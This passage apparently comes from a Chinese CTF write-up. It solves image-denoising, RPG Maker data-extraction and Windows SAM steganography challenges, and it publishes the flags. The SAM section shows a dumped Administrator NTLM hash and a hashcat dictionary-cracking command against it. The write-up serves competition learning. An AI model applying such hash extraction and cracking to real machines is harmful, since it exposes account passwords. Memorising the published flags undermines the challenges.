\u88ab\u62c6\u5206\u5230\u4e86\u4e24\u6761\u72ec\u7acb\u7684\u903b\u8f91\u94fe\u8def\u4e0a\u3002\u5fc5\u987b\u540c\u65f6\u6253\u901a\u201c\u56fe\u50cf\u591a\u5e27\u964d\u566a\u201d\u4e0e\u201c\u6587\u672c\u96f6\u5bbd\u5b57\u7b26\u89e3\u7801\u201d\uff0c\u624d\u80fd\u5c06\u4e24\u6bb5\u8f7d\u8377\u62fc\u63a5\u51fa\u6700\u7ec8\u7684 flag\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nLSB\u53ef\u4ee5\u53d1\u73b0\u53f3\u4e0a\u89d2\u7684\u5b57\u7b26\u4e32 \u6d88\u9664\u566a\u70b9\u5c31\u884c\u4e86<\/p>\n\n\n\n
\u63d0\u53d6\u9644\u4ef6\u4e2d\u7684 1.png \u5230 8.png\u3002\n\u8fd9 8 \u5f20\u56fe\u7247\u662f\u5e26\u6709\u72ec\u7acb\u968f\u673a\u566a\u58f0\u7684\u540c\u5e95\u56fe\uff0c\u5229\u7528\u7edf\u8ba1\u5b66\u7279\u6027\uff0c\u5c06\u5b83\u4eec\u5728 Numpy \u4e2d\u9010\u50cf\u7d20\u53d6\u5747\u503c\uff0c\u5373\u53ef\u5927\u5e45\u62b5\u6d88\u566a\u70b9\u3002\n\u5c06\u964d\u566a\u540e\u7684\u5747\u503c\u56fe\u50cf\u8fdb\u884c\u53cd\u76f8\uff08Invert\uff09\u5904\u7406\u3002\n\u67e5\u770b\u751f\u6210\u7684\u56fe\u50cf\u53f3\u4e0a\u89d2\uff0c\u53ef\u4ee5\u76f4\u63a5\u8bfb\u53d6\u51fa\u524d\u534a\u6bb5\u5b57\u7b26\u4e32\uff1aDASCTF{Logistic_and\u3002<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\nexp.py<\/p>\n\n\n\n
import numpy as np\nfrom PIL import Image, ImageOps\n\ndef decode_image_chain():\n image_paths = [f\"{i}.png\" for i in range(1, 9)]\n images = [np.array(Image.open(path)) for path in image_paths]\n avg_img_array = np.mean(images, axis=0).astype(np.uint8)\n avg_img = Image.fromarray(avg_img_array)\n\n if avg_img.mode == 'RGBA':\n r, g, b, a = avg_img.split()\n rgb_img = Image.merge('RGB', (r, g, b))\n inverted_img = ImageOps.invert(rgb_img)\n final_img = Image.merge('RGBA', (*inverted_img.split(), a))\n else:\n final_img = ImageOps.invert(avg_img)\n\n final_img.save(\"recovered_first_half.png\")\n\nif __name__ == \"__main__\":\n decode_image_chain()<\/code><\/pre>\n\n\n\n\u62fc\u63a5\u5c31\u884c<\/p>\n\n\n\n
Logistic_and_time_fly<\/code><\/pre>\n\n\n\ngame_go_1<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n\u4e00\u4e2a\u6e38\u620f \u5b89\u88c5 \u53ef\u4ee5\u770b\u5230\u6e38\u620f\u5185\u5bb9<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nflag\u53ea\u80fd\u5728\u6570\u636e\u91cc\u9762 data\u91cc\u9762<\/p>\n\n\n\n
Weapons.rvdata2 \u53ef\u4ee5\u53d1\u73b0\u7b2c\u4e00\u6bb5flag<\/p>\n\n\n\n
strings Data\/*.rvdata2 | grep -E \"[0-9a-f]{8}-\"\nstrings\u4e5f\u53ef\u4ee5 \u8dd1\u51fa\u7684\u524d\u534a\u6bb5 1168cb17-31ff-43b7-<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\nDASCTF{1168cb17-31ff-43b7-<\/code><\/pre>\n\n\n\n\u53e6\u4e00\u4e2aflag\u5728Scripts.rvdata2\u6587\u4ef6\u3002\u8be5\u6587\u4ef6\u662f Ruby Marshal \u5e8f\u5217\u5316\u540e\u7684\u811a\u672c\u6570\u7ec4\uff0c\u5305\u542b\u811a\u672c ID\u3001\u540d\u79f0\u53ca\u7ecf\u8fc7 zlib \u538b\u7f29<\/strong>\u7684\u6e90\u7801\u3002<\/p>\n\n\n\n\u5b9a\u4f4d\u76ee\u6807\uff1a \u6587\u4ef6\u672b\u5c3e\u5b58\u5728\u4e00\u4e2a\u540d\u4e3a flag<\/code> \u7684\u81ea\u5b9a\u4e49\u811a\u672c\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u5728 RPG Maker VX Ace \u4e2d\uff0c\u51fa\u9898\u4eba\u81ea\u5b9a\u4e49\u7684\u903b\u8f91\u901a\u5e38\u5199\u5728 Scripts.rvdata2 \u4e2d\u3002\u8fd9\u4e2a\u6587\u4ef6\u662f\u4e00\u4e2a\u88ab Ruby Marshal \u5e8f\u5217\u5316\u8fc7\u7684\u6570\u7ec4\uff0c\u6570\u7ec4\u7684\u7b2c\u4e09\u4e2a\u5143\u7d20\u5b58\u653e\u7740\u88ab Zlib \u538b\u7f29\u8fc7\u7684 Ruby \u6e90\u4ee3\u7801\u3002\u6211\u4eec\u9700\u8981\u63d0\u53d6\u5e76\u89e3\u538b\u8fd9\u4e9b Zlib \u6570\u636e\u5757\u3002<\/code><\/pre>\n\n\n\n\u53a8\u5b50\u4e5f\u884c<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nexp.py<\/p>\n\n\n\n
import zlib\nimport re\n\ndef solve():\n with open(\"Scripts.rvdata2\", \"rb\") as f:\n data = f.read()\n\n for match in re.finditer(b'x78x9c', data):\n try:\n do = zlib.decompressobj()\n dec = do.decompress(data[match.start():])\n text = dec.decode('utf-8', errors='ignore')\n if \"-\" in text and \"}\" in text:\n print(text.strip())\n except:\n pass\n\nif __name__ == \"__main__\":\n solve()<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n-b586-8414d383afce}<\/code><\/pre>\n\n\n\nDASCTF{1168cb17-31ff-43b7-b586-8414d383afce}\n\u63d0\u4ea41168cb17-31ff-43b7-b586-8414d383afce \u5c31\u884c<\/code><\/pre>\n\n\n\nSAM_and_Steg<\/h2>\n\n\n\n
\u6bd4\u8d5b\u6700\u540e\u624d\u89e3\u51fa \u7136\u540e\u65f6\u95f4\u7ed3\u675f\u4e86 \u6ca1\u6709\u63d0\u4ea4\u4e0a\u53bb<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u9898\u76ee\u63d0\u4f9b\u4e86\u4e24\u4e2a Windows \u6ce8\u518c\u8868\u914d\u7f6e\u5355\u5143\u6587\u4ef6\uff1asam<\/code> \u548c system<\/code>\u3002\u6574\u4f53\u5206\u4e3a\u56db\u6b65\uff1aHash\u7834\u89e3 -> \u5bfb\u627e\u9690\u85cf\u7ebf\u7d22 -> \u56fe\u50cf\u9690\u5199\u63d0\u53d6 -> OpenSSL\u89e3\u5bc6\u3002<\/p>\n\n\n\n\u5229\u7528 sam<\/code> \u548c system<\/code> \u6587\u4ef6\u63d0\u53d6\u7cfb\u7edf\u7528\u6237\u7684 NTLM Hash\uff0c\u5e76\u8fdb\u884c\u5b57\u5178\u7834\u89e3\u83b7\u53d6\u7b2c\u4e00\u5c42\u5bc6\u7801\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:476b4dddbbffde29e739b618580adb1e:::\n*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n\n\u5f97\u5230 Administrator \u7528\u6237\u7684 NT-Hash\uff1a476b4dddbbffde29e739b618580adb1e<\/code><\/pre>\n\n\n\n\u7834\u89e3 Hash\uff1a<\/strong> Hashcat \u7528 rockyou \u5b57\u5178\u8fdb\u884c\u7834\u89e3\u3002<\/p>\n\n\n\nCMD5\u4e5f\u884c\u4f46\u662f\u8981 \u94b1<\/p>\n\n\n\n
\u547d\u4ee4<\/p>\n\n\n\n
hashcat -m 1000 476b4dddbbffde29e739b618580adb1e \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u6587\u4ef6\u5206\u79bb\u4e0e\u63d0\u793a<\/p>\n\n\n\n
\u4f7f\u7528 binwalk \u5206\u79bb\u4f53\u79ef\u8f83\u5927\u7684 system<\/code> \u6587\u4ef6\uff0c\u53d1\u73b0\u5176\u5c3e\u90e8\u6346\u7ed1\u4e86\u4e00\u5f20\u56fe\u7247jpg\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nforemost \u63d0\u53d6\u5c31\u884c<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nSAM \u6587\u4ef6\u5c3e\u90e8\uff1a\u91cc\u9762\u6709\u5bc6\u7801<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nSilentEye \u9690\u5199\u63d0\u53d6<\/p>\n\n\n\n
\u63d0\u53d6\u51fa \u7684 jpg \u56fe\u7247\u8fdb\u884c SilentEye \u9690\u5199\u63d0\u53d6 \u53ef\u4ee5\u5f97\u5230 \u52a0\u5bc6\u7684\u6587\u4ef6 \u5e94\u8be5\u5c31\u662fflag<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u5229\u7528\u56fe\u7247\u63d0\u793a\u7684 OpenSSL \u73af\u5883\u548c\u7b2c\u4e8c\u6b65\u53d1\u73b0\u7684\u5bc6\u7801\uff0c\u5bf9 AES256<\/code> \u5bc6\u6587\u8fdb\u884c\u89e3\u5bc6\u3002<\/p>\n\n\n\n\u6307\u5b9a aes-256-cbc \u7b97\u6cd5\uff0c\u5229\u7528 -md sha256<\/code> \u53c2\u6570\u548c\u63d0\u53d6\u5230\u7684\u5bc6\u94a5 p@s4w0rd<\/code> \u89e3\u5bc6\u6587\u4ef6\uff0c\u5e76\u8f93\u51fa\u4e3a\u538b\u7f29\u5305\u683c\u5f0f\u3002<\/p>\n\n\n\nopenssl enc -d -aes-256-cbc -md sha256 -k p@s4w0rd -in AES256 -out flag.tar.gz\ntar -zxvf flag.tar.gz #\u89e3\u538b\u5c31\u884c<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\naa28f51d-0f54-4286-af3c-86a14fbab4a4<\/code><\/pre>\n\n\n\nWeb<\/h1>\n\n\n\n\u62ef\u6551\u8299\u8389\u83b2<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n\u4fe1\u606f\u6536\u96c6<\/p>\n\n\n\n
![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-1.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-2.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-3-1024x627.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-4-1024x361.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-5.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-6-1024x382.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-7-1024x393.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-8-1024x364.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-9-1024x548.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-10-1024x477.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-11-1024x507.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-12-1024x471.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-13.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-14-1024x526.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-15-1024x549.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-16-1024x508.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-17-1024x526.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-18-1024x390.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-19.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-20-1024x591.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-21-1024x551.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-22.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-23.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-24-1024x617.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-25-1024x61.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-26.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-27.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-28-1024x526.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-29.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-30-1024x488.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-31.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-32-1024x483.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-33.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-34-1024x559.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-35-1024x487.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-36-1024x632.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-37.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-38-1024x697.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-39-1024x661.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-40-1024x525.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-41.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-42-1024x70.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-43.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-44-1024x587.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-45.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-46.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-47.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-48.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-49.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image-50-1024x434.png\")
<\/div><\/figure>\n\n\n\n